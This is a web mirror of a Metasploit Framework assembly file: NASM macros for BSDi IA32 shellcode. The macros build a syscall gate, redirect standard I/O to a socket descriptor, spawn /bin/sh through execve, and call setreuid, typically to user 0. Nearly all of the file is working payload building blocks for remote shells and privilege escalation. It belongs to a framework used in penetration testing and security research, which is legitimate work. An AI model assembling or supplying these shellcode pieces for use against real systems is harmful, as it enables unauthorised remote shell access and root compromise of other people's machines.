CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/shellcode/bsdi/ia32/generic.asm
Views: 11784
1
;;

2
;

3
;        Name: generic

4
;        Type: Macro Set

5
;   Qualities: None

6
;     Authors: skape <mmiller [at] hick.org>

7
;     Version: $Revision: 1633 $

8
;     License: 

9
;

10
;        This file is part of the Metasploit Exploit Framework

11
;        and is subject to the same licenses and copyrights as

12
;        the rest of this package.

13
;

14
; Description:

15
;

16
;        This file provides a generic API of macros that can be used

17
;        by payloads.  No payloads are actually implemented within this

18
;        file.

19
;

20
; Macro List:

21
;

22
;        execve_binsh - Executes a command shell with flags

23
;        setreuid     - Set real/effective user id

24
;;

25
BITS 32

26


27
;;

28
; Define undefined assumptions

29
;;

30
%ifndef ASSUME_REG_EDX

31
%define ASSUME_REG_EDX -1

32
%endif

33
%ifndef ASSUME_REG_EAX

34
%define ASSUME_REG_EAX -1

35
%endif

36


37
;;

38
;

39
;     Macro: initialize_lcall_esi

40
;   Purpose: Builds out lcall/ret into esi

41
;;

42
%macro initialize_lcall_esi 0

43


44
	push dword 0xc3000700

45
	mov  eax, 0x9a

46
	cdq

47
	push eax

48
	mov  esi, esp

49


50
%endmacro

51


52
;;

53
;     Macro: execve_binsh

54
;   Purpose: Execute a command shell with various options

55
; Arguments:

56
;

57
;    Execution flags: Flags used for executing the command shell in a 

58
;                     number of modes.

59
;

60
;        EXECUTE_REDIRECT_IO      => Redirects stdin/stdout/stderr to the fd

61
;                                    passed in 'edi'.

62
;;

63
%define EXECUTE_REDIRECT_IO      0x0001

64


65
%macro execve_binsh 1

66


67
	%if %1 & EXECUTE_REDIRECT_IO

68


69
dup:

70
%if ASSUME_REG_EDX != 2

71
	push byte 0x2

72
	pop  ecx

73
%endif

74
dup_loop:

75
%if ASSUME_REG_EAX == 0

76
	mov  al, 0x5a

77
%else

78
	push byte 0x5a

79
	pop  eax

80
%endif

81
%if ASSUME_REG_EDX == 2

82
	push edx

83
%else

84
	push ecx

85
%endif

86
%ifdef FD_REG_EBX

87
	push ebx

88
%else

89
	push edi

90
%endif

91
	call esi

92
%if ASSUME_REG_EDX == 2

93
	dec  edx

94
%else

95
	dec  ecx

96
%endif

97
	jns  dup_loop

98


99
	%undef  ASSUME_REG_EAX

100
	%define ASSUME_REG_EAX 0

101


102
	%endif

103


104
execve:

105
%if ASSUME_REG_EAX == 0

106
	push eax

107
%else

108
	push byte 0x3b

109
	pop  eax

110
	cdq

111
	push edx

112
%endif

113
	push dword 0x68732f2f

114
	push dword 0x6e69622f

115
	mov  ebx, esp

116
	push eax

117
	push esp

118
	push ebx

119
%if ASSUME_REG_EAX == 0

120
	mov  al, 0x3b

121
%endif

122
	call esi

123


124
%endmacro

125


126
;;

127
;     Macro: setreuid

128
;   Purpose: Set effective user id

129
; Arguments:

130
;

131
;    User ID: The user identifier to setreuid to, typically 0.

132
;;

133


134
%macro setreuid 1

135


136
setreuid:

137


138
	%if %1 == 0

139


140
	xor  eax, eax

141


142
	%else

143


144
		%if %1 < 256

145


146
		push byte %1

147


148
		%else

149


150
		push dword %1

151


152
		%endif

153


154
	pop  eax

155


156
	%endif

157


158
	push eax

159
	push eax

160
	mov  al, 0x7e

161
	call esi

162


163
%endmacro

164


165